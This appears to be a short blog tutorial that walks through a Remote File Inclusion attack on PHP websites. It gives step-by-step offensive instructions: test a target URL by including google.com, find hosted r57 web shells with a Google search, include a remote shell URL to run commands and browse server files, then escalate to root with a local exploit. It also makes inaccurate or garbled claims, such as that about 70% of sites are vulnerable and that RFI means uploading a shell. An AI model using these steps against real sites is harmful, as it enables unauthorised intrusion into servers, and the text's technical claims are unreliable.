Remote File Inclusion or RFI occurs when a shell is uploaded by the attacker into the website this allows the attacker to execute commands remotely into the server as a user. This also gives the attacker the power to browse all the files of the server.
Almost 70 % websites are vulnerable to this kind of attack.
The reason that makes this attack is possible is because of the PHP's default settings of register_globals and allow_url_fopen being enabled.
All the websites which are using PHP 5.0 or less are vulnerable to this kind of attack.
Ok now I will now bore you ,now I will show you how to perform this kind of attack.
Step1.Lets chose a target ok.(here Iam taking the target aswww.target.com)
Step2.To find that if the www.target.com is vulnerable to RFI or not we will see its structure.
Generally the websites vulnerable to RFI are have the structure like:
http://www.target.com/index.php/page=Pageno
Ok lets assume that the target has the same structure like RFI then we will try to redrict the site to google ok if googles homepage shows up then www.target.com is vulnerable to RFI.
Ok so the finish url would be:.http://www.target.com/index.php/page=http://www.google.com
Step3.Ok now we know that the target.com is vulnerable to RFI so we will try to include a shell
into the website.
Step4.Here I will include r57 shell. To search for alerady uploaded shell we will search for inurl:r57.txt in google this will give us the website in which the shell is running.
Step5.So the final url would be
http://www.target.com/index.php/page=http://www.shellsite.com/r57.txt?
I have included a ? because anything after ? Will be passed to the shell and not cause any problem.
Step6.If the attack will suceed then we will see a screen similiar to the following:
This is a shell and it will display all the files in the server computer.
Step7.Now we will try to get root acces into the target computer by running a local exploit against it.
Also visit www.divyaranjan.com for more articles
No comments:
Post a Comment